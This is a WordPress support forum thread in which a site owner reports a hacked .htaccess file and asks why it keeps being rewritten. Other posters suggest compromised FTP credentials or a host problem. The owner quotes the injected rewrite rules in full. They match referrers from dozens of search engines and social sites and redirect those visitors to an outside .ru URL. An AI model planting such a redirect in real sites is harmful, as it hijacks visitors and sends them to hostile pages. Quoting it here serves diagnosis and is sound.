• my .htaccess has been hacked.
    for those who doesnt know how it looks, i will attach you the code

    <IfModule Mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://tarifvest.ru/terms/condition.php [R=301,L]
    </IfModule>

    what this means? all my visitors who comes from those search engines, will be redirected to their website.
    how did i tried to fix this ?
    – reinstalled wordpress 3.3.1
    – changing .htaccess attributes into 644 (without success, after 10 minutes they rewrite it)
    between first install and hacked version, no one accessed my cpanel or my ssh account – ips for last visits were mine.
    – changing cpanel password
    – changing mysql user and password
    – got hacked on 3 different servers (for test)
    but without a chance… so it is obvious there is a problem with wordpress.. an exploit or something. when you gonna fix it ?!
    if somebody has a solution for this, please let me know. thank you

Viewing 6 replies - 1 through 6 (of 6 total)
  • could this be your server host? though i’ve never had this problem, but I do know that not all hosts are secured. try contacting them to see if they may be the cause.

    as for wordpress, when you clean installed, did you also reinstall your backup? it could also be an internal plugin or something from inside that also.

    Thread Starter samfingcul

    (@samfingcul)

    i was hacked on host1plus.com, hostgator.com and privilegeserver.com
    i reinstalled from admin panel (from update you can reinstall). not from backup, of course.
    hostgator said that my password was compromised but i dont think so.. i had different passwords for all wordpress and i chaged them also. anyway, somebody from wordpress maybe can clear this problem

    hostgator said that my password was compromised but i dont think so

    And what about your ftp password?

    Thread Starter samfingcul

    (@samfingcul)

    if i am chaning a password from cpanel, it automatically changes for ftp and ssh also. and i repeat.. there was different password on different servers

    If you have been using unencrypted ftp, then it’s likely that your ftp login details were compromised and that this is how the hackers entered your site.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Advisor and Activist

    Does your log monitor FTP, in addition to the SSH/cPanel you previously mentioned?

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘WORDPRESS when you will fix your bugs ?!’ is closed to new replies.